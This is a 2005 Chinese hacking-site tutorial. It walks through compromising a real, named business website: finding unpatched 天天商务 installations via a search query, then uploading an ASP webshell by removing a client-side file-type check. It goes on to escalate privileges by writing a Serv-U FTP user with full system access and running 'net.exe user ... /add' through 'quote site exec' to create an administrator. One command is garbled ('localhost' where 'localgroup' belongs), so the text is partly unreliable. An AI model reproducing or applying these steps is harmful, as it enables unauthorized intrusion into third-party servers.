首页 | 业界新闻 | 黑客教程 | 安全漏洞 | 安全文章 | 破解技术 | 技术文摘 | 黑客文化 | 本站原创 | 安全贴吧 | 在线留言 | IP查询 | 软件下载 | 繁体中文 |
您现在的位置: 黑色反击 >> 技术资讯 >> 黑客教程 >> 入侵实例 >> 正文
天天商务上传利用
时间:2005-2-23 17:29:18 出处:网络 作者:佚名 编辑:mervin 点击数:

BY:火狐技术联盟
Name:心随剑舞
QQ:304886618
e-mail:webasp@yeah.net

上传漏洞太流行了,今天无聊网上找了一下上传利用的教程,怎么找来找去没有发现有天天商务的本地提交,cimg_save.asp也没有限制文件格式的上传利用,好几个月前我就发现了,可是网上一查怎么还是一堆没有打补丁的……

    去找一下……

    http://www.google.com/search?hl=zh-CN&ie=UTF-8&q=cimg_add.asp&btnG=Google%E6%90%9C%E7%B4%A2&lr=

    就第一个吧http://qiye.sz.js.cn/manage/qyml/


    上传


    打开上传的网页(这个网页本来加了一个脚本限制上传文件格式,所以只要去掉然后把你要上传的地址真上去就可以了,比动网上传利用还要快…………^_^)

文件已经成功上传,是否继续添加……
F:\ASP木马\20041014144547.asp (29K) 上传 成功!

这个上传程序写入的目录是在PIC/后面

OK
    提升权限

    找到了他的Serv-U FTP SERVER那就好办了,看看有没有写入修改的权限,太可怜了,有写入的权限

    加一个系统权限的用户

这个可能大家都已经非常利害了,我就不多说了……

User0=webasp|1|0

SKEYValues=
[USER=webasp|1]
Password=no7C154C45EDA5D0AABBC7DD93B0AEB078
HomeDir=c:\\

TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=

ftp>open ip    
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id  //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password  //密码
230 User logged in, proceed.
ftp> cd winnt   //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为Windows目录。
250 Directory changed to /WINNT
ftp>cd system32  //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user 用户名 密码 /add   //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators 用户名 /add  //提升为超级用户

   
看看有没有终端……哈哈,漏洞太多了……惨,直接就用3389进系统吧……



完!

精彩推荐
hack菜鸟入门
VB 从零开始编外挂(完
IPC入侵全接触
QQ跨站漏洞巧利用,强
WinXP中CPU占用100%原
黑客新技术 灰鸽子巧妙
实例讲解 黑客入侵论坛
ADSL共享上网方式大总
BMP文件格式分析
十招教你学会破解
热门软件
网 友 评 论
关于我们 - 联系方式 - 招聘信息 - 合作伙伴 - 网站地图 - 广告服务 - 我要投稿 - 设为首页 - 加入收藏
黑色反击 力倡网络安全,崇尚互联共享,欢迎各种媒体转载我们的原创作品 [转载请注明出处]。
EMAIL:hf110.com@gmail.com 备案:苏ICP备05010002号